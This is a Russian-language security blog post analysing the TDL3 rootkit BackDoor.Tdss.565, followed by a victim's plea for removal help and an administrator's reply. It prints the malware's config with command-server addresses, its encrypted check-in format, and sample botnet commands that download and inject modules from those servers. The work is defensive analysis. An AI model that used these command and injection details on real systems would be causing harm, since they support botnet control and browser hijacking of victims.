Информационная безопасность компьютерных систем и защита конфиденциальных данных
Вредоносные программы

BackDoor.Tdss.565

автор: Administrator | 12 ноября 2009, 14:30 | Просмотров: 10434
теги: Вредоносные программы, BackDoor.Tdss.565, троян, интернет, компьютер, Rustock, файл, ОС



Описание:
Это довольно изощренный троянец предназначенный для управления удаленным компьютером через сеть или интернет. Использует руткит-технологии, который значительно превосходит по сложности лечения небезызвестный Rustock.C.

Вредоносная программа для обеспечения своей последующей автозагрузки заражает системный драйвер, обслуживающий физический диск, на котором установлена ОС.

В дальнейшем руткит-модуль скрывает все изменения в системе и осуществляет внедрение компонентов пользовательского режима в процессы согласно файлу конфигурации.

Дополнительные сведения о данной вредоносной программы, смотрите в статье:
От BackDoor.Tdss.565 и выше (aka TDL3)

Тип вредоносной программы:
троян

ОС подверженные заражению:
Windows XP, Windows Vista, Windows 7

Уровень опасности:
высокий

Технические детали:
При инсталляции внедряет свой код в системный процесс и оттуда создает и запускает временный сервис с именем tdlserv:

[HKLM\system\currentcontrolset\services\tdlserv]
Imagepath=" \??\C:\DOCUME~1\\LOCALS~1\Temp\3.tmp"
Type=1


Данный драйвер для обеспечения своей последующей автозагрузки заражает системный драйвер обслуживающий физический диск, где находится ОС (например, atapi.sys).

Оригинальные байты из зараженного драйвера и сам основной код руткита сохраняются в последних секторах диска. Там же организует скрытый шифрованный виртуальный диск. На этот диск записываются компоненты пользовательского режима tdlcmd.dll, tdlwsp.dll и файл конфигурации config.ini.

Руткит модуль скрывает все изменения в системе и осуществляет внедрение компонент пользовательского режима в процессы согласно файлу конфигурации.

Пример. Содержимое файла config.ini:
[main]
version=3.0
botid=4513c055-11f2-8278-7863-3d82b9b804c8
affid=10002
subid=0
installdate=1.10.2009 9:4:38
[injector]
svchost.exe=tdlcmd.dll
*=tdlwsp.dll
[tdlcmd]
servers=https://h3456345.cn/;https://h9237634.cn/;https://212.117.174.173/


Модуль TDLCMD.DLL:
Модуль, отвечающий за обновления вредоносной программы и её компонент с управляющего сервера.

Из собственного имени извлекает путь к виртуальному диску, созданному руткит-драйвером и считывает данные из файла config.ini об управляющих серверах, идентификаторе бота и т.д.

Получает информацию о версии системы, языке системы и браузере по-умолчанию. Эти данные представляются в виде строки:
4513c055-11f2-8278-7863-3d82b9b804c8|10002|0|3.0|3.1|5.1 2600 SP1.0|ru-ru|iexplore
(botid|affid|Subid|bot_version|loader_version|system_version|locale|browser)


Она сначала шифруется RC4 с ключом в виде имени сервера (например: h3456345.cn), затем кодируется в base64. И полученный запрос отправляется на сервер.

Пример:
https://h3456345.cn/gJdwOLwW21dVuODFVDCvEuknIdD1k+Bc8Rnq3uFl2VbBscU44iqKKslUgRXjw2Rb/Vk48jWDFc3HwZ+Mno1/yx+sVdbaH0XgRMuAczm9JI2KBg==


В ответ получает зашифрованный набор инструкции и исполняет их. Инструкции представляют собой имена функций в загруженных модулях вредоносной программы и их параметры.

Пример:
botnetcmd.ModuleDownloadUnxor('https://h3456345.cn/2c0lfrNDklNZveSSVX6nFesyPdarl/5J8ErqwbRkjV3ctsI4rHmDeMFWyUan0Q==', '\\?\globalroot\systemroot\system32\botnetwsp8y.dll')
botnetcmd.InjectorAdd('*','botnetwsp8y.dll')
botnetcmd.SetCmdDelay(14400)
botnetcmd.FileDownloadRandom('https://h3456345.cn/2c0lfrNDklZZveSSVX6nFesyPdarl/5J8ErqwbRkjV3ctsI4rHmDeMFWyUan0Q==','\\?\globalroot\systemroot\system32\botnet.dat')
tdlcmd.ConfigWrite('tdlcmd','delay','1800')
tdlcmd.ConfigWrite('tdlcmd','servers','https://h3456345.cn/;https://h9237634.cn/;https://212.117.174.173/')


Ссылки в параметрах представляют из себя зашифрованные команды серверу, например:
2c0lfrNDklNZveSSVX6nFesyPdarl/5J8ErqwbRkjV3ctsI4rHmDeMFWyUan0Q==

это "module|1!4513c055-11f2-8278-7863-3d82b9b804c8!", файлы скачиваемые по таким ссылкам зашифрованы идентификатором бота (4513c055-11f2-8278-7863-3d82b9b804c8).

Так в данном случае, botnetwsp8y.dll является обновлением для модуля tdlwsp.dll, а botnet.dat это список командных серверов.


Модуль TDLWSP.DLL:
Внедряется согласно файлу конфигурации во все процессы, но работает только в тех имена которых содержат подстроки:
explore
firefox
chrome
opera
safari
netscape
avant
browser

Перехватывает функцию mswsock.dll!WSPStartup.

В обработчике перехваченной функции WSPStartup, подменяет в таблице SPI (service provider interface) процедуры WSPSend, WSPRecv и WSPCloseSocket на свои. Т.о. работая как классический LSP (Layered Service Provider)


С этого момента вредоносная программа полностью контролирует пользовательские запросы и способна подменять результаты поисковых машин и перенаправлять пользователя на вредоносные сайты. Информация о перенаправлении и реакции на ключевые слова приходит от командного сервера.

Удаление:
Для удаления руткита, рекомендуется использовать программы для удаления новых модификаций BackDoor.Tdss




источник:
vms.drweb.com
@ Татьяна
7 декабря 2009, 03:34 | |  
Аватар пользователя Татьяна
карма:
комментариев: 0
новостей: 0
группа: Гости
#3 Удалить все ключи реестра, созданные вредоносной программой; восстановить изменённые настройки (использовать regedit.exe)

как это сделать?

Татьяна,
Не могу больше, помогите. Пожалуйста. Замучил этот чёртов троян. C:WINDOWS\SISTEM32\TDLCMD.DLL
@ Administrator
7 декабря 2009, 04:07 | |  
Аватар пользователя Administrator
карма: +4676.926
комментариев: 239
новостей: 1005
группа: SysOp
Татьяна,
Во-первых, нужно сканировать компьютер с помощью утилитой Dr.Web CureIt!.

Во-вторых, если хотите удалить ключи реестра, запустите реестр реестр;
для этого нажмите:
Пуск-> Выполнить-> написать в строке: regedit

Сделайте поиск (F3) по слову botnetwsp8y.dll и удалите все найденные ключи.
Потом, тоже самое с tdlwsp.dll и botnet.dat.
Обратная связь

Информация


Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.